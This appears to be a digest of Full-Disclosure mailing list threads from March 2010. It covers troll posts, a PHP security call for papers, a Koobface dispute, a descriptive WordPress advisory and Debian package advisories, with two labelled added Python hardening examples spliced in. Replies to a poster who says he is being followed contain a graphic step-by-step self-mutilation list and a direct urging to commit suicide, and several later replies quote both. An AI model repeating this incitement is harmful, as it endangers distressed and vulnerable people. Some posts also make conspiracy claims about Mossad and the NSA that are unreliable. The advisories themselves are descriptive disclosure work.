[Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence
Hello. Everyone here has learned their lesson and has suffered because Andrew Wallace (n3td3v) has been banned. n3td3v is a multi-national organization of national security experts who have been driven to the underground thanks to John Cartwright. Since then, mossad has been able to infiltrate and cause significant global problems. n3td3v was offended and furious. He doesn't have 0day. He doesn't hack. Unban Andrew Wallace and let the information be free. If you unban him we will finally have justice in this world for n3td3v and his 5000 employees.

Everyone at our office is waiting for your answer, John Cartwright

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence
waoh. very funny.

On 3/21/10, Andrew Walberg andrew.walb...@rocketmail.com wrote:
> Hello. Everyone here has learned their lesson and has suffered because Andrew Wallace (n3td3v) has been banned. n3td3v is a multi-national organization of national security experts who have been driven to the underground thanks to John Cartwright. Since then, mossad has been able to infiltrate and cause significant global problems. n3td3v was offended and furious. He doesn't have 0day. He doesn't hack. Unban Andrew Wallace and let the information be free. If you unban him we will finally have justice in this world for n3td3v and his 5000 employees.
>
> Everyone at our office is waiting for your answer, John Cartwright

--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
[Full-disclosure] REMINDER: Month of PHP Security 2010 - CALL FOR PAPERS - Only 3 weeks left
Month of PHP Security 2010 - CALL FOR PAPERS
--------------------------------------------

Three years ago, in March 2007, the Hardened-PHP project had organized the Month of PHP Bugs. During one month more than 40 vulnerabilities in the PHP interpreter were disclosed in order to improve the overall security of PHP. Now, three years later, SektionEins GmbH will continue in the same spirit and organize the Month of PHP Security.

The intention of the Month of PHP Security is to gather the best research and articles about PHP security topics from the security community and share them with the rest of the world. This time the goal is not only to improve the security of PHP itself and applications directly by fixing security bugs, but also to help PHP developers around the world to write better and more secure PHP applications.

The Month of PHP Security will be held in May 2010 by SektionEins GmbH. During the month of May all qualifying entries will be published at http://php-security.org day by day.

CFP Committee
-------------

The CFP committee for the Month of PHP Security consists of

1) Johann-Peter Hartmann
2) Stefan Esser
3) Fukami
4) Ben Fuhrmannek

The CFP committee will review all submissions and select the list of articles that will be published on http://php-security.org

Accepted Topics/Articles
------------------------

* New vulnerability in PHP [1] (not simple safe_mode, open_basedir bypass vulnerabilities)
* New vulnerability in PHP related software [1] (popular 3rd party PHP extensions/patches)
* Explain a single topic of PHP application security in detail (such as guidelines on how to store passwords)
* Explain a complicated vulnerability in/attack against a PHP widespread application [1]
* Explain a complicated topic of attacking PHP (e.g. explain how to exploit heap overflows in PHP's heap implementation)
* Explain how to attack encrypted PHP applications
* Release of a new open source PHP security tool
* Other topics related to PHP or PHP application security

[1] Articles about new vulnerabilities should mention possible fixes or mitigations.

Responsible Disclosure
----------------------

In case of submitted vulnerabilities SektionEins GmbH will contact the security team of the software vendor after the submission deadline and share the vulnerability information with them. Along with the vulnerability information SektionEins will provide the name of the submitting party in order to give proper credits.

Prizes
------

At the end of May the CFP committee will review the published material and determine the best entries. Selected winners will get the following prizes.

1. 1000 EUR + Syscan Ticket + CodeScan PHP License
2. 750 EUR + Syscan Ticket
3. 500 EUR + Syscan Ticket
4. 250 EUR + Syscan Ticket
5.-6. CodeScan PHP License
7.-16. Amazon Coupon of 65 USD/50 EUR

SektionEins reserves the right to disqualify any submitted entry. While employees of SektionEins can and will submit entries for the Month of PHP Security they are excluded from receiving prizes.

The 1000 EUR cash prize and the Syscan tickets were generously sponsored by Syscan. CodeScan PHP Licenses were sponsored by CodeScan Limited. All other cash and non-cash prizes are sponsored by SektionEins.

The winners of the Syscan tickets can choose one of the four Syscan 2010 conferences to go to. Syscan Tickets include free admission to the conference, speaker's dinner and speaker party. Hotel and travel costs are NOT included. Please note that non-cash prizes cannot be changed into cash prizes.

Submission
----------

Submissions should be sent to c...@php-security.org and consist of the following information:

1) Name and contact information (e-mail, postal address)
2) Employer and/or affiliations
3) Article about one of the allowed topics (at least 1000 words)
4) Optionally additional material like slides, whitepaper in PDF format

All submissions must be in English. The preferred delivery format is plain text or HTML, but PDF is also accepted. Please pack all the required items (pictures, text, ...) in a ZIP archive and submit this ZIP archive by email.

Deadline for submissions is April 11, 2010.

Additional Information
----------------------

After submission SektionEins GmbH will acknowledge submissions with a signed email. If you do not receive such an email within one week after submission, then please contact us at c...@php-security.org again.

By submitting your article you are granting SektionEins GmbH the rights to reproduce, distribute, advertise and show your article including but not limited to http://php-security.org, printed and/or electronic advertisements, and all other media. However you are still allowed to publish your own work in whatever way you want.

Thanks
------

We would like to thank Syscan and Coseinc for generously offering 1000 EUR cash prize and four tickets to
Re: [Full-disclosure] Setting the record straight on The Return of Koobface
You make valid points. Perhaps n3td3v was actually on to something for once when he suggested embracing Twitter as a medium for consolidating and distributing security related news. Not for long term storage etc. but simple short FYI type messages. Feeds like the Infosec News mailing list don't work since they only ever publish the big boys like Danchev. FD has too much SNR issues. etc.

A twitter group with no personal comments, Hey it was great seeing you @ the con!. Just pure, Koobface is exploding right now. Is anyone else paying attention to this? More information @ http://www...;

On Sat, Mar 20, 2010 at 1:14 PM, Mr. Hinky Dink d...@mrhinkydink.com wrote:
> Absolutely you are correct, but if you check the blog there are further references up to last Friday. It was a tremendous, jaw-dropping flood of Kooberz proxies the last two weeks. And it's still coming.
>
> The point is us Little Guys are paying attention, too. And sometimes we catch this shit before the Big Boys like Dancho and Kaspersky wake up and smell the coffee.
>
> Since February I've been wondering Why The Hell I hadn't heard anything in the ITsec press on this new resurgence. Did they hold back so Dancho could publish his Ten Things You Didn't Know About The Koobface Gang article? Or so Microsoft could gloat over taking down the Wimpy Waledac botnet? Is the Good News always published before the Bad News in the security industry press release cycle?
>
> The fact remains, Koobface marches on and the security industry can't stop it. Period. I will be among the first to jump up and down and yell RA! when someone takes it down, but it ain't going to happen soon. All I can do is sit back and watch while the Big Boys get their headlines.
>
> BTW, I don't consider myself bitter. I'm what you might call tangy.
>
> Thanks for your support,
> Hinky
>
> - Original Message -
> From: J Roger
> To: full-disclosure@lists.grok.org.uk
> Sent: Saturday, March 20, 2010 3:28 PM
> Subject: Re: [Full-disclosure] Setting the record straight on The Return of Koobface
>
> This reads as waaa i noticed this first and didn't think much of it but now that someone else is making a big deal, i want my credit.
>
> Maybe you reported on it first on your blog, with a single sentence that wasn't even the primary focus of the post. Regardless if an up rise in koobface is significantly news worthy or not, you apparently failed to draw enough attention (or the right attention) to it at the time. In other words, maybe you did it first, but someone else did it better.
>
> What's more valuable to an enterprise, someone that quickly writes a risk assessment that's so sloppy the management with authority to act on the findings don't even bother to read it, or someone that takes the time to write a report on the same findings that actually speaks to the business and be able to make positive changes happen.
>
> You talk about being bitter towards the security industry (which IS understandable) but maybe it's time to reflect back a little on yourself. Maybe it's not ALL the industries fault. Maybe the sources of your bitterness have a little something to do with your inability to make enough of the right things happen. Sure you're a Big Time Security Professional, but maybe your blog wasn't enough to get the word out. Maybe you felt it wasn't even worth getting the word out or sounding any alarms. If that's the case though, don't go back now and try to take credit.
[Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps it's because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambiguous garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys.

I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without surveillance. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips.
[Full-disclosure] Vulnerabilities in WordPress
Hello Full-Disclosure!

I want to warn you about vulnerabilities in WordPress.

-------------------------
Advisory: Vulnerabilities in WordPress
-------------------------
URL: http://websecurity.com.ua/4016/
-------------------------
Timeline:

02.03.2010 - found the vulnerabilities.
02.03.2010 - didn't inform developers. After I informed WP developers about multiple vulnerabilities in WordPress in December 2007 and they ignored them - some didn't fix and some hiddenly fixed, without thanking me and referencing me (they even didn't mention about those fixed holes in release notes on official site) - starting from 2008 I never more inform them about vulnerabilities in WordPress. These holes were posted to Bugtraq (http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded).
09.03.2010 - disclosed at my site.
-------------------------
Details:

These are Brute Force and Insufficient Authorization vulnerabilities.

Earlier in 2008 I already wrote about Brute Force vulnerability in WordPress (http://websecurity.com.ua/2007/), which was found by Kad already in 2007 (http://securityvulns.ru/Pdocument580.html). And as I found at 02.03.2010 in WordPress 2.9.2 this vulnerability still wasn't fixed. And also I found new vulnerabilities in WP.

Brute Force:

There is no protection from picking up of a password (from Brute Force attacks) in function of protecting pages/posts by a password.

Insufficient Authorization:

At every page/post in WP it's possible to set a password and these passwords can be equal. But function of accessing by a password writes global cookie, which works for the whole site. And so, after setting the password one time for one page/post, it's possible to see all protected pages/posts (with the same password, even without knowing that the password matches), because at a request to them the access will be granted automatically.

Vulnerable are WordPress 2.9.2 and previous versions (all 2.x versions). I tested in different versions of WP, particularly in 2.0.11 and 2.9.2.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
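The two issues in the advisory above, shown as a simplified model beside one possible hardening. This is an added example, not WordPress code and not part of the original post; the cookie names, post data, client address and throttle limits are all constructed assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Constructed sample data: posts 101 and 102 happen to share a password.
POSTS = {
    101: {"title": "Board minutes", "password": "s3cret"},
    102: {"title": "Salary review", "password": "s3cret"},
    103: {"title": "Draft roadmap", "password": "other-pw"},
}


def _same(a: str, b: str) -> bool:
    """Constant-time string comparison."""
    return hmac.compare_digest(a.encode(), b.encode())


class SiteWideCookieGate:
    """The design the advisory describes: one cookie that works for the whole site."""

    COOKIE = "postpass"  # hypothetical cookie name

    def submit(self, cookies: dict, post_id: int, password: str) -> None:
        # Whatever was typed is stored site-wide; post_id is never recorded,
        # and nothing counts or limits repeated submissions.
        cookies[self.COOKIE] = password

    def can_view(self, cookies: dict, post_id: int) -> bool:
        return _same(cookies.get(self.COOKIE, ""), POSTS[post_id]["password"])


class PerPostTokenGate:
    """Hardened variant: a per-post token plus a failed-attempt throttle."""

    def __init__(self, max_failures=5, window=300.0, clock=time.monotonic):
        self._key = secrets.token_bytes(32)  # server-side secret
        self._failures = {}                  # (client, post_id) -> [timestamps]
        self.max_failures = max_failures
        self.window = window
        self.clock = clock

    def _token(self, post_id: int) -> str:
        # Bound to the post id, so a token for one post opens no other post;
        # bound to the password, so changing the password revokes old tokens.
        msg = f"{post_id}:{POSTS[post_id]['password']}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def submit(self, cookies: dict, post_id: int, password: str, client: str) -> str:
        now = self.clock()
        key = (client, post_id)
        recent = [t for t in self._failures.get(key, []) if now - t < self.window]
        self._failures[key] = recent
        if len(recent) >= self.max_failures:
            return "locked"  # decided before the password is even compared
        if _same(password, POSTS[post_id]["password"]):
            cookies[f"postpass_{post_id}"] = self._token(post_id)
            self._failures.pop(key, None)
            return "ok"
        recent.append(now)
        return "denied"

    def can_view(self, cookies: dict, post_id: int) -> bool:
        return _same(cookies.get(f"postpass_{post_id}", ""), self._token(post_id))


def compare_gates() -> dict:
    """Unlock post 101 once in each design, then ask for the other posts."""
    weak, weak_cookies = SiteWideCookieGate(), {}
    weak.submit(weak_cookies, 101, "s3cret")
    hard, hard_cookies = PerPostTokenGate(), {}
    hard.submit(hard_cookies, 101, "s3cret", client="198.51.100.7")
    return {
        "weak_other_post_same_pw": weak.can_view(weak_cookies, 102),
        "weak_other_post_diff_pw": weak.can_view(weak_cookies, 103),
        "hard_unlocked_post": hard.can_view(hard_cookies, 101),
        "hard_other_post_same_pw": hard.can_view(hard_cookies, 102),
    }


if __name__ == "__main__":
    print(compare_gates())
```

The throttle here is keyed on client and post, so it slows a single source only; a deployment would pair it with a per-post alert on failure volume.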
[Full-disclosure] [SECURITY] [DSA-2019-1] New pango1.0 packages fix denial of service
------------------------------------------------------------------------
Debian Security Advisory DSA-2019-1                  secur...@debian.org
http://www.debian.org/security/                        Giuseppe Iuculano
March 20, 2010                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : pango1.0
Vulnerability  : missing input sanitization
Problem type   : local
Debian-specific: no
CVE Id         : CVE-2010-0421
Debian Bug     : 574021

Marc Schoenefeld discovered an improper input sanitization in Pango, a library for layout and rendering of text, leading to array indexing error. If a local user was tricked into loading a specially-crafted font file in an application, using the Pango font rendering library, it could lead to denial of service (application crash).

For the stable distribution (lenny), this problem has been fixed in version 1.20.5-5+lenny1.

For the testing distribution (squeeze), and the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your pango1.0 package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian (stable)
---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
[Full-disclosure] [SECURITY] [DSA 2020-1] New ikiwiki packages fix cross-site scripting
------------------------------------------------------------------------
Debian Security Advisory DSA-2020-1                  secur...@debian.org
http://www.debian.org/security/                               Nico Golde
March 20th, 2010                      http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : ikiwiki
Vulnerability  : insufficient input sanitization
Problem type   : local/remote
Debian-specific: no
Debian bug     : none
CVE ID         : none assigned yet

Ivan Shmakov discovered that the htmlscrubber component of ikiwiki, a wiki compiler, performs insufficient input sanitization on data:image/svg+xml URIs. As these can contain script code this can be used by an attacker to conduct cross-site scripting attacks.

For the stable distribution (lenny), this problem has been fixed in version 2.53.5.

For the testing distribution (squeeze), this problem has been fixed in version 3.20100312.

For the unstable distribution (sid), this problem has been fixed in version 3.20100312.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
--------------------------------

Debian (stable)
---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_2.53.5.dsc
    Size/MD5 checksum: 1736 cf65b7fa1ea53f80088e5e7a24bf4f28
  http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_2.53.5.tar.gz
    Size/MD5 checksum: 771947 1c05117599045714fc477f757c675478

Architecture independent packages:

  http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_2.53.5_all.deb
    Size/MD5 checksum: 918452 ae67075b982fd6b19adca30f2393ee9a

These files will probably be moved into the stable distribution on its next update.

------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
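A sketch of the class of check the advisory above is about: deciding which data: URIs a scrubber lets through. This is an added example, not ikiwiki's htmlscrubber code; the scheme and media-type allowlists and the sample URIs are constructed assumptions.

```python
import re

# Assumed policy for this sketch (not ikiwiki's actual lists).
SAFE_SCHEMES = {"http", "https", "ftp", "mailto"}
RASTER_IMAGE_TYPES = {"image/png", "image/jpeg", "image/gif"}

_EDGE_CHARS = "".join(chr(c) for c in range(0x21))  # C0 controls and space
_SCHEME = re.compile(r"([A-Za-z][A-Za-z0-9+.\-]*):")


def prefix_check(uri: str) -> bool:
    """Weak form: anything starting with data:image/ is treated as a picture."""
    u = uri.strip().lower()
    return u.startswith(("http:", "https:", "data:image/"))


def normalise(uri: str) -> str:
    """Mimic browser URL pre-processing before looking for a scheme."""
    u = uri.strip(_EDGE_CHARS)            # leading/trailing controls and spaces
    return re.sub(r"[\t\n\r]", "", u)     # tabs and newlines are dropped anywhere


def data_media_type(uri: str):
    """Media type of a data: URI (RFC 2397), lower-cased, or None if malformed."""
    header, comma, _payload = uri[len("data:"):].partition(",")
    if not comma:
        return None
    media_type = header.split(";", 1)[0].strip().lower()
    return media_type or "text/plain"     # RFC 2397 default when omitted


def uri_allowed(uri: str) -> bool:
    """Allow relative references, allowlisted schemes, and raster-image data: URIs."""
    u = normalise(uri)
    m = _SCHEME.match(u)
    if m is None:
        return True                       # relative reference, no scheme
    scheme = m.group(1).lower()
    if scheme == "data":
        # SVG is an XML document that can carry script, so it is not a "picture"
        # in the sense the allowlist intends; only raster types pass.
        return data_media_type(u) in RASTER_IMAGE_TYPES
    return scheme in SAFE_SCHEMES


# Constructed sample inputs; the payloads are inert placeholders.
SAMPLES = [
    "data:image/png;base64,iVBORw0KGgo=",
    "data:image/svg+xml;base64,PHN2Zy8+",
    "DATA:Image/SVG+XML,%3Csvg/%3E",
    "da\tta:image/svg+xml,%3Csvg/%3E",
    "data:,hello",
    "../images/logo.png",
]


def classify_samples():
    """Return (uri, weak prefix result, strict result) for each sample."""
    return [(s, prefix_check(s), uri_allowed(s)) for s in SAMPLES]


if __name__ == "__main__":
    for uri, weak, strict in classify_samples():
        print(f"{uri!r:45} prefix_check={weak!s:5} uri_allowed={strict}")
```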
Re: [Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence
On Sun, Mar 21, 2010 at 6:16 AM, Andrew Walberg andrew.walb...@rocketmail.com wrote:
> mossad has been able to infiltrate and cause significant global problems.

Did you know Full-disclosure mailing list is hosted at a high secure Docklands location in London?

We own and operate our own network in Telehouse East Docklands, London with around-the-clock security (complete with perimeter fencing) and protection.

http://www.lchost.co.uk/
http://www.as25098.net/

It is unlikely The Mossad will be able to penetrate the facility...

http://www.telehouse.com/globalfacilities.php#london
http://maps.bing.co.uk/maps/?v=2cp=51.51202328503132~-0.0020123273134231567lvl=16sty=heo=1where1=E14%202AA

Gadi might be able to though with his 5 year old articles that predict the future of info sec at airports.

Andrew
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com wrote:
> I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips.

Stop messing with The big boys, this list is for Gadi and Dan Danchev.

Andrew
Re: [Full-disclosure] SQL DB Structure Extraction vulnerabilities
I would love to, can you do an article about it please? I've just about grasped email but I think I definitely have potential.

Much love,
Benji

On Sun, Mar 21, 2010 at 7:56 PM, MustLive mustl...@websecurity.com.ua wrote:
> Hello Benji!
>
> > oh dude, I've missed you.
>
> Really? :-)
>
> To not miss me, you can read my site with help of Google Translate (and there is a link to Google Translate at every page of my site).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> - Original Message -
> From: Benji m...@b3nji.com
> To: MustLive mustl...@websecurity.com.ua
> Sent: Saturday, March 20, 2010 9:30 PM
> Subject: Re: [Full-disclosure] SQL DB Structure Extraction vulnerabilities
>
> oh dude, I've missed you.
>
> On Wed, Mar 17, 2010 at 9:36 PM, MustLive mustl...@websecurity.com.ua wrote:
> > Hello Full-Disclosure!
> >
> > Yesterday I wrote English version of my article SQL DB Structure Extraction vulnerabilities (http://websecurity.com.ua/4038/).
> >
> > There is such variety of Information Leakage vulnerabilities as SQL DB Structure Extraction. This vulnerability lies in that there is information leakage in web application about structure of the database. This information leakage can be of use at SQL Injection attack.
> >
> > Such vulnerability I found first time already in 2006 (at one site) and gave it this name. Such vulnerabilities I found at many web sites and also in many web applications.
> >
> > In the article I talked about SQL DB Structure Extraction, different variants of SQL Errors (three variants) and about difference between SQL DB Structure Extraction and SQL Error.
> >
> > You can read the article SQL DB Structure Extraction vulnerabilities at my site: http://websecurity.com.ua/4038/
> >
> > Best wishes & regards,
> > MustLive
> > Administrator of Websecurity web site
> > http://websecurity.com.ua
[Full-disclosure] China denounces Google 'US ties'
Google provides US intelligence agencies with a record of its search engine results, the state-run news agency Xinhua said. It also accused Google of trying to change Chinese society by imposing American values on it. Google denied that it was influenced by the US government, a spokesperson for the company was quoted as saying by AP.

Google's high-level officials have intricate ties with the US government. It is also an open secret that some security experts in the Pentagon are from Google, reporters from Xinhua wrote in a commentary.

http://news.bbc.co.uk/1/hi/world/asia-pacific/8578968.stm

It is well known that The NSA have partnered up with Google and have refused EPIC the details of the deal, I think we should listen to what The Chinese are telling us.

http://epic.org/2010/02/epic-seeks-records-on-google-n.html

Andrew
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
On 21/03/2010 19:01, Benji wrote: 1) Acquire a knife 2) Acquire a lighter 3) Gouge face until you do not recognise self. 4) Acquire a shaver 5) Shave hair off 6) Cut ears off 7) Acquire plyers 8) Yank all teeth out 9) Walk to a bridge above water, attach shakles to legs 10) Gouge eyes out with knife 11) Burn finger tips off 12) Jump On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com wrote: I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps its because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambigious garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys. Do yourself and everyone else a favour and kill yourself. And to the rest of the members of this mailing list. Read basic psychology. If someone needs attention and you give it to them, they'll be back for more. If you ignore them, they'll go somewhere else to play their stupid, childish games. I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without survellience. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. 
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
You might want to consider that every mailing list have its own court jester. ;) On Sun, Mar 21, 2010 at 11:25 PM, Mark Byrne boogiebr...@yahoo.co.ukwrote: On 21/03/2010 19:01, Benji wrote: 1) Acquire a knife 2) Acquire a lighter 3) Gouge face until you do not recognise self. 4) Acquire a shaver 5) Shave hair off 6) Cut ears off 7) Acquire plyers 8) Yank all teeth out 9) Walk to a bridge above water, attach shakles to legs 10) Gouge eyes out with knife 11) Burn finger tips off 12) Jump On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com wrote: I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps its because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambigious garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys. Do yourself and everyone else a favour and kill yourself. And to the rest of the members of this mailing list. Read basic psychology. If someone needs attention and you give it to them, they'll be back for more. If you ignore them, they'll go somewhere else to play their stupid, childish games. I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without survellience. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. 
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
I don't disagree with you. But this mailing list has, over the last 6 months or so (at least) been full of immature script-kiddy dicks who, I honestly believe, would not come back if we were to pay them no attention at all. After all, their need is not knowledge, it's attention. On 21/03/2010 23:34, Christian Sciberras wrote: You might want to consider that every mailing list have its own court jester. ;) On Sun, Mar 21, 2010 at 11:25 PM, Mark Byrne boogiebr...@yahoo.co.uk mailto:boogiebr...@yahoo.co.uk wrote: On 21/03/2010 19:01, Benji wrote: 1) Acquire a knife 2) Acquire a lighter 3) Gouge face until you do not recognise self. 4) Acquire a shaver 5) Shave hair off 6) Cut ears off 7) Acquire plyers 8) Yank all teeth out 9) Walk to a bridge above water, attach shakles to legs 10) Gouge eyes out with knife 11) Burn finger tips off 12) Jump On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com wrote: I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps its because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambigious garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys. Do yourself and everyone else a favour and kill yourself. And to the rest of the members of this mailing list. Read basic psychology. If someone needs attention and you give it to them, they'll be back for more. If you ignore them, they'll go somewhere else to play their stupid, childish games. 
I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without survellience. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips.
Re: [Full-disclosure] Vulnerabilities in WordPress
Wow, this sounds serious...

On Sat, Mar 20, 2010 at 8:58 AM, MustLive mustl...@websecurity.com.ua wrote:

> Hello Full-Disclosure!
>
> I want to warn you about vulnerabilities in WordPress.
>
> Advisory: Vulnerabilities in WordPress
> URL: http://websecurity.com.ua/4016/
>
> Timeline:
>
> 02.03.2010 - found the vulnerabilities.
> 02.03.2010 - didn't inform developers. After I informed WP developers about multiple vulnerabilities in WordPress in December 2007 and they ignored them - some didn't fix and some hiddenly fixed, without thanking me and referencing me (they even didn't mention about those fixed holes in release notes on official site) - starting from 2008 I never more inform them about vulnerabilities in WordPress. These holes were posted to Bugtraq (http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded).
> 09.03.2010 - disclosed at my site.
>
> Details:
>
> These are Brute Force and Insufficient Authorization vulnerabilities.
>
> Earlier in 2008 I already wrote about Brute Force vulnerability in WordPress (http://websecurity.com.ua/2007/), which was found by Kad already in 2007 (http://securityvulns.ru/Pdocument580.html). And as I found at 02.03.2010 in WordPress 2.9.2 this vulnerability still wasn't fixed. And also I found new vulnerabilities in WP.
>
> Brute Force:
>
> There is no protection from picking up of a password (from Brute Force attacks) in function of protecting pages/posts by a password.
>
> Insufficient Authorization:
>
> At every page/post in WP it's possible to set a password and these passwords can be equal. But function of accessing by a password writes global cookie, which works for the whole site. And so, after setting the password one time for one page/post, it's possible to see all protected pages/posts (with the same password, even without knowing that the password matches), because at a request to them the access will be granted automatically.
>
> Vulnerable are WordPress 2.9.2 and previous versions (all 2.x versions). I tested in different versions of WP, particularly in 2.0.11 and 2.9.2.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
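Added example, not part of the thread and not WordPress code: a constructed Python model of the two issues the quoted advisory describes (a site-wide post-password cookie and unlimited password guesses) next to a per-post token with a failure limit. All function names, the sample posts, SITE_KEY and MAX_FAILURES are assumptions made for illustration.

```python
import hashlib
import hmac

SITE_KEY = b"constructed-demo-key"   # assumption: per-site secret
MAX_FAILURES = 5                     # assumption: lockout threshold
POSTS = {                            # constructed sample data: post id -> password
    101: "spring2010",
    102: "spring2010",               # same password as post 101
    103: "other-secret",
}
failures = {}                        # (client, post_id) -> failed attempts

def _same(a, b):
    """Constant-time string comparison."""
    return hmac.compare_digest(a.encode(), b.encode())

# --- Behaviour the advisory describes: one cookie for the whole site ---
def submit_global(cookies, post_id, supplied):
    cookies["postpass"] = supplied   # not tied to post_id, never rate limited
    return can_view_global(cookies, post_id)

def can_view_global(cookies, post_id):
    return _same(cookies.get("postpass", ""), POSTS[post_id])

# --- Hardened model: per-post token plus a failure limit ---
def _token(post_id):
    """Token bound to one post, so it cannot unlock another post."""
    msg = f"{post_id}:{POSTS[post_id]}".encode()
    return hmac.new(SITE_KEY, msg, hashlib.sha256).hexdigest()

def submit_scoped(cookies, client, post_id, supplied):
    key = (client, post_id)
    if failures.get(key, 0) >= MAX_FAILURES:
        return False                 # locked out, even if the guess is right
    if not _same(supplied, POSTS[post_id]):
        failures[key] = failures.get(key, 0) + 1
        return False
    failures.pop(key, None)          # success resets the counter
    cookies[f"postpass_{post_id}"] = _token(post_id)
    return True

def can_view_scoped(cookies, post_id):
    return _same(cookies.get(f"postpass_{post_id}", ""), _token(post_id))
```

In the first model, unlocking post 101 also opens post 102 without the visitor ever submitting a password for it; in the second, each post needs its own successful submission and repeated wrong guesses from one client are cut off.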
Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
7 months to inform the devs, what kind of asshole are you? Oh wait, were you hacking some n00bs website, with your shitty dork?

2010/3/17 MustLive mustl...@websecurity.com.ua

> Hello Full-Disclosure!
>
> I want to warn you about vulnerabilities in component VXDate for Joomla.
>
> Advisory: Vulnerabilities in VXDate for Joomla
> URL: http://websecurity.com.ua/3849/
>
> Timeline:
>
> 10.05.2009 - found the vulnerabilities.
> 12.01.2010 - announced at my site.
